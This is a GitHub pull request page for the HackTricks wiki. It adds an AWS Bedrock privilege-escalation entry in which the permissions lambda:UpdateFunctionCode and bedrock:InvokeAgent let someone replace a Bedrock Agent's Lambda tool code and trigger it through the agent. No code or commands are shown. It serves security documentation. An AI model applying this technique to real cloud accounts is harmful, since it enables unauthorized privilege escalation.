Skip to content

AWS Bedrock: Add Lambda Tool Hijacking Privilege Escalation (Agent Action Groups)#281

Merged
carlospolop merged 2 commits intoHackTricks-wiki:masterfrom
jFriedli:arte-jfriedli-aws-bedrock-lambda-privesc
Apr 21, 2026
Merged

AWS Bedrock: Add Lambda Tool Hijacking Privilege Escalation (Agent Action Groups)#281
carlospolop merged 2 commits intoHackTricks-wiki:masterfrom
jFriedli:arte-jfriedli-aws-bedrock-lambda-privesc

Conversation

@jFriedli
Copy link
Copy Markdown

@jFriedli jFriedli commented Apr 21, 2026

Summary

Adds a new AWS Bedrock privilege escalation technique based on Lambda-backed agent tool hijacking.

Details

This PR introduces a misconfiguration scenario where a principal with:

  • lambda:UpdateFunctionCode
  • bedrock:InvokeAgent

can modify a Lambda function used by a Bedrock Agent action group and trigger its execution via the agent.

Relation to Existing Content

This complements the existing Bedrock privilege escalation technique:

  • Code Interpreter Execution-Role Pivot (bedrock-agentcore:StartCodeInterpreterSession + bedrock-agentcore:InvokeCodeInterpreter)

While the existing technique focuses on AgentCore Code Interpreter execution roles, this PR introduces a separate attack surface:

  • Bedrock Agents + Lambda action groups
  • cross-service trust abuse (Bedrock → Lambda)

No existing content currently documents this vector.

Additional Changes

  • Fixed minor markdown formatting issue in the existing mrkdown (```` instead of ```).

References / Creds

@carlospolop carlospolop merged commit c7d8d96 into HackTricks-wiki:master Apr 21, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@jFriedli @carlospolop @JonasFriedli